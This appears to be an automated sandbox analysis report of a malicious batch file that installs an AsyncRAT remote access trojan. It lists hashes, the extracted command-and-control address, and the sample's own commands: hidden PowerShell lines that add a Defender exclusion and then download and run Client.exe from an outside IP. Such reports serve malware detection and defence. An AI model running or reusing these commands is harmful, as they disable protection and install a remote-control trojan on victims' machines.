Analysis
-
max time kernel
148s -
max time network
126s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
06-08-2024 01:47
Static task
static1
Behavioral task
behavioral1
Sample
6308f3eef2d45148c4544a0c31d5bb73f28dac4b6fcb854e003e2caa0c39d26f.bat
Resource
win7-20240708-en
General
-
Target
6308f3eef2d45148c4544a0c31d5bb73f28dac4b6fcb854e003e2caa0c39d26f.bat
-
Size
7KB
-
MD5
90c3dfd74d6ab4b7b98777930ab44a23
-
SHA1
7f536fa9c3972c4416e8620335e39f9e93092103
-
SHA256
6308f3eef2d45148c4544a0c31d5bb73f28dac4b6fcb854e003e2caa0c39d26f
-
SHA512
aab364913c7f3972a136d2cf9241e46adf275bf74cdaedd0697746b4d0244a517a832154ead9849c36d2cc710c80e2754cff1d2b5c845041f0b5e0d6fd115a92
-
SSDEEP
12:b4tdk5jtnrC0yyGyDF98oul666666666666HW4xmBWp/CR898U7LtaJO20c1H:b4/otrlyRKubxwWRCRKpJD8H
Malware Config
Extracted
http://20.199.84.103/Client.exe
Extracted
asyncrat
1.0.7
Default
127.0.0.1:1024
20.199.84.103:1024
DcRatMutex_qwqdanchun
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x000a0000000120f8-21.dat family_asyncrat -
Blocklisted process makes network request 1 IoCs
flow pid Process 4 1976 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
pid Process 1976 powershell.exe 2072 powershell.exe 2072 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
pid Process 2888 Client.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2072 powershell.exe 1976 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2072 powershell.exe Token: SeDebugPrivilege 1976 powershell.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2968 wrote to memory of 2140 2968 cmd.exe 31 PID 2968 wrote to memory of 2140 2968 cmd.exe 31 PID 2968 wrote to memory of 2140 2968 cmd.exe 31 PID 2968 wrote to memory of 2072 2968 cmd.exe 32 PID 2968 wrote to memory of 2072 2968 cmd.exe 32 PID 2968 wrote to memory of 2072 2968 cmd.exe 32 PID 2968 wrote to memory of 1976 2968 cmd.exe 33 PID 2968 wrote to memory of 1976 2968 cmd.exe 33 PID 2968 wrote to memory of 1976 2968 cmd.exe 33 PID 2968 wrote to memory of 2888 2968 cmd.exe 34 PID 2968 wrote to memory of 2888 2968 cmd.exe 34 PID 2968 wrote to memory of 2888 2968 cmd.exe 34
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\6308f3eef2d45148c4544a0c31d5bb73f28dac4b6fcb854e003e2caa0c39d26f.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2968 -
C:\Windows\system32\fsutil.exefsutil dirty query C:2⤵PID:2140
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -c Add-MpPreference -ExclusionPath "C:\Windows\Temp\"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2072
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w hidden -c "(New-Object System.Net.WebClient).DownloadFile('http://20.199.84.103/Client.exe', 'C:\Windows\Temp\Client.exe')"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1976
-
-
C:\Windows\Temp\Client.exe"C:\Windows\Temp\Client.exe"2⤵
- Executes dropped EXE
PID:2888
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\U31LXEYFU8AVYYIW95HT.temp
Filesize7KB
MD532861813b8d40353781312c061945c0a
SHA194ec60cb2dd1ef945b3a58064df5dc5f728f93bd
SHA2565970106481ca6e22576fbb748409602134f98c1a2577a86e7908ac56f76587a1
SHA51286757a9261c3f9ad0698543aa4fcf5d08da39570fc54a3188e0333d715b2393d46a1ae937b80967be5e356437b183b0e0be75ac026958c6d2a041ddd27a631b7
-
Filesize
47KB
MD5fedb1274930bfa08a83480134a3f1412
SHA1d47be6340ecd780274b98dad463749eb2d9d49fd
SHA256a8fcd268b48c903e21500439d6754500d59d12d7d5d4e2c7ea737661fa8fe230
SHA512ba1d2a9745b837c1f984577a5d96bff1b2c126d86fd75c7e763b085ea8440360899d383be10a7a6f31bbd87c215c3dfed82c03c15880e8f4ef336c411cb448b4